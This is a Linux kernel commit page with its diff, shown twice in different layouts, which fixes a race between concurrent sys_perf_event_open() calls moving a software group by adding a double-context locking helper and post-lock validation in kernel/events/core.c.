perf/core: Fix concurrent sys_perf_event_open() vs. 'move_group' race

Di Shen reported a race between two concurrent sys_perf_event_open() calls where both try and move the same pre-existing software group into a hardware context. The problem is exactly that described in commit: f63a8daa5812 ("perf: Fix event->ctx locking") ... where, while we wait for a ctx->mutex acquisition, the event->ctx relation can have changed under us. That very same commit failed to recognise sys_perf_event_context() as an external access vector to the events and thereby didn't apply the established locking rules correctly. So while one sys_perf_event_open() call is stuck waiting on mutex_lock_double(), the other (which owns said locks) moves the group about. So by the time the former sys_perf_event_open() acquires the locks, the context we've acquired is stale (and possibly dead). Apply the established locking rules as per perf_event_ctx_lock_nested() to the mutex_lock_double() for the 'move_group' case. This obviously means we need to validate state after we acquire the locks. Reported-by: Di Shen (Keen Lab) Tested-by: John Dias <joaodias@google.com> Signed-off-by: Peter Zijlstra (Intel) <peterz@infradead.org> Cc: Alexander Shishkin <alexander.shishkin@linux.intel.com> Cc: Arnaldo Carvalho de Melo <acme@kernel.org> Cc: Arnaldo Carvalho de Melo <acme@redhat.com> Cc: Jiri Olsa <jolsa@redhat.com> Cc: Kees Cook <keescook@chromium.org> Cc: Linus Torvalds <torvalds@linux-foundation.org> Cc: Min Chong <mchong@google.com> Cc: Peter Zijlstra <peterz@infradead.org> Cc: Stephane Eranian <eranian@google.com> Cc: Thomas Gleixner <tglx@linutronix.de> Cc: Vince Weaver <vincent.weaver@maine.edu> Fixes: f63a8daa5812 ("perf: Fix event->ctx locking") Link: http://lkml.kernel.org/r/20170106131444.GZ3174@twins.programming.kicks-ass.net Signed-off-by: Ingo Molnar <mingo@kernel.org>
author: Peter Zijlstra <peterz@infradead.org> 2017-01-11 15:09:50 -0500
committer: Ingo Molnar <mingo@kernel.org> 2017-01-14 04:56:11 -0500
commit: 321027c1fe77f892f4ea07846aeae08cefbbb290 (patch)
tree: e90493b64144be2e6e9564dca1afe870d393765c /kernel/events
parent: 63cae12bce9861cec309798d34701cf3da20bc71 (diff)
1 files changed, 54 insertions, 4 deletions
diff --git a/kernel/events/core.c b/kernel/events/core.c
index 72ce7d63e561..cbc5937265da 100644
--- a/kernel/events/core.c
+++ b/kernel/events/core.c
@@ -9529,6 +9529,37 @@ static int perf_event_set_clock(struct perf_event *event, clockid_t clk_id)
        return 0;
 }
+/*
+ * Variation on perf_event_ctx_lock_nested(), except we take two context
+ * mutexes.
+ */
+static struct perf_event_context *
+__perf_event_ctx_lock_double(struct perf_event *group_leader,
+                             struct perf_event_context *ctx)
+{
+        struct perf_event_context *gctx;
+again:
+        rcu_read_lock();
+        gctx = READ_ONCE(group_leader->ctx);
+        if (!atomic_inc_not_zero(&gctx->refcount)) {
+                rcu_read_unlock();
+                goto again;
+        }
+        rcu_read_unlock();
+        mutex_lock_double(&gctx->mutex, &ctx->mutex);
+        if (group_leader->ctx != gctx) {
+                mutex_unlock(&ctx->mutex);
+                mutex_unlock(&gctx->mutex);
+                put_ctx(gctx);
+                goto again;
+        }
+        return gctx;
+}
 /**
 * sys_perf_event_open - open a performance event, associate it to a task/cpu
 *
@@ -9772,12 +9803,31 @@ SYSCALL_DEFINE5(perf_event_open,
        }
        if (move_group) {
-                gctx = group_leader->ctx;
+                gctx = __perf_event_ctx_lock_double(group_leader, ctx);
-                mutex_lock_double(&gctx->mutex, &ctx->mutex);
                if (gctx->task == TASK_TOMBSTONE) {
                        err = -ESRCH;
                        goto err_locked;
                }
+                /*
+                 * Check if we raced against another sys_perf_event_open() call
+                 * moving the software group underneath us.
+                 */
+                if (!(group_leader->group_caps & PERF_EV_CAP_SOFTWARE)) {
+                        /*
+                         * If someone moved the group out from under us, check
+                         * if this new event wound up on the same ctx, if so
+                         * its the regular !move_group case, otherwise fail.
+                         */
+                        if (gctx != ctx) {
+                                err = -EINVAL;
+                                goto err_locked;
+                        } else {
+                                perf_event_ctx_unlock(group_leader, gctx);
+                                move_group = 0;
+                        }
+                }
        } else {
                mutex_lock(&ctx->mutex);
        }
@@ -9879,7 +9929,7 @@ SYSCALL_DEFINE5(perf_event_open,
        perf_unpin_context(ctx);
        if (move_group)
-                mutex_unlock(&gctx->mutex);
+                perf_event_ctx_unlock(group_leader, gctx);
        mutex_unlock(&ctx->mutex);
        if (task) {
@@ -9905,7 +9955,7 @@ SYSCALL_DEFINE5(perf_event_open,
 err_locked:
        if (move_group)
-                mutex_unlock(&gctx->mutex);
+                perf_event_ctx_unlock(group_leader, gctx);
        mutex_unlock(&ctx->mutex);
 /* err_file: */
        fput(event_file);
author	Peter Zijlstra <peterz@infradead.org>	2017-01-11 15:09:50 -0500
committer	Ingo Molnar <mingo@kernel.org>	2017-01-14 04:56:11 -0500
commit	321027c1fe77f892f4ea07846aeae08cefbbb290 (patch)
tree	e90493b64144be2e6e9564dca1afe870d393765c /kernel/events
parent	63cae12bce9861cec309798d34701cf3da20bc71 (diff)

diff --git a/kernel/events/core.c b/kernel/events/core.c index 72ce7d63e561..cbc5937265da 100644 --- a/kernel/events/core.c +++ b/kernel/events/core.c
@@ -9529,6 +9529,37 @@ static int perf_event_set_clock(struct perf_event *event, clockid_t clk_id)
9529	return 0;	9529	return 0;
9530	}	9530	}
9531		9531
		9532	/*
		9533	* Variation on perf_event_ctx_lock_nested(), except we take two context
		9534	* mutexes.
		9535	*/
		9536	static struct perf_event_context *
		9537	__perf_event_ctx_lock_double(struct perf_event *group_leader,
		9538	struct perf_event_context *ctx)
		9539	{
		9540	struct perf_event_context *gctx;
		9541
		9542	again:
		9543	rcu_read_lock();
		9544	gctx = READ_ONCE(group_leader->ctx);
		9545	if (!atomic_inc_not_zero(&gctx->refcount)) {
		9546	rcu_read_unlock();
		9547	goto again;
		9548	}
		9549	rcu_read_unlock();
		9550
		9551	mutex_lock_double(&gctx->mutex, &ctx->mutex);
		9552
		9553	if (group_leader->ctx != gctx) {
		9554	mutex_unlock(&ctx->mutex);
		9555	mutex_unlock(&gctx->mutex);
		9556	put_ctx(gctx);
		9557	goto again;
		9558	}
		9559
		9560	return gctx;
		9561	}
		9562
9532	/**	9563	/**
9533	* sys_perf_event_open - open a performance event, associate it to a task/cpu	9564	* sys_perf_event_open - open a performance event, associate it to a task/cpu
9534	*	9565	*
@@ -9772,12 +9803,31 @@ SYSCALL_DEFINE5(perf_event_open,
9772	}	9803	}
9773		9804
9774	if (move_group) {	9805	if (move_group) {
9775	gctx = group_leader->ctx;	9806	gctx = __perf_event_ctx_lock_double(group_leader, ctx);
9776	mutex_lock_double(&gctx->mutex, &ctx->mutex);	9807
9777	if (gctx->task == TASK_TOMBSTONE) {	9808	if (gctx->task == TASK_TOMBSTONE) {
9778	err = -ESRCH;	9809	err = -ESRCH;
9779	goto err_locked;	9810	goto err_locked;
9780	}	9811	}
		9812
		9813	/*
		9814	* Check if we raced against another sys_perf_event_open() call
		9815	* moving the software group underneath us.
		9816	*/
		9817	if (!(group_leader->group_caps & PERF_EV_CAP_SOFTWARE)) {
		9818	/*
		9819	* If someone moved the group out from under us, check
		9820	* if this new event wound up on the same ctx, if so
		9821	* its the regular !move_group case, otherwise fail.
		9822	*/
		9823	if (gctx != ctx) {
		9824	err = -EINVAL;
		9825	goto err_locked;
		9826	} else {
		9827	perf_event_ctx_unlock(group_leader, gctx);
		9828	move_group = 0;
		9829	}
		9830	}
9781	} else {	9831	} else {
9782	mutex_lock(&ctx->mutex);	9832	mutex_lock(&ctx->mutex);
9783	}	9833	}
@@ -9879,7 +9929,7 @@ SYSCALL_DEFINE5(perf_event_open,
9879	perf_unpin_context(ctx);	9929	perf_unpin_context(ctx);
9880		9930
9881	if (move_group)	9931	if (move_group)
9882	mutex_unlock(&gctx->mutex);	9932	perf_event_ctx_unlock(group_leader, gctx);
9883	mutex_unlock(&ctx->mutex);	9933	mutex_unlock(&ctx->mutex);
9884		9934
9885	if (task) {	9935	if (task) {
@@ -9905,7 +9955,7 @@ SYSCALL_DEFINE5(perf_event_open,
9905		9955
9906	err_locked:	9956	err_locked:
9907	if (move_group)	9957	if (move_group)
9908	mutex_unlock(&gctx->mutex);	9958	perf_event_ctx_unlock(group_leader, gctx);
9909	mutex_unlock(&ctx->mutex);	9959	mutex_unlock(&ctx->mutex);
9910	/* err_file: */	9960	/* err_file: */
9911	fput(event_file);	9961	fput(event_file);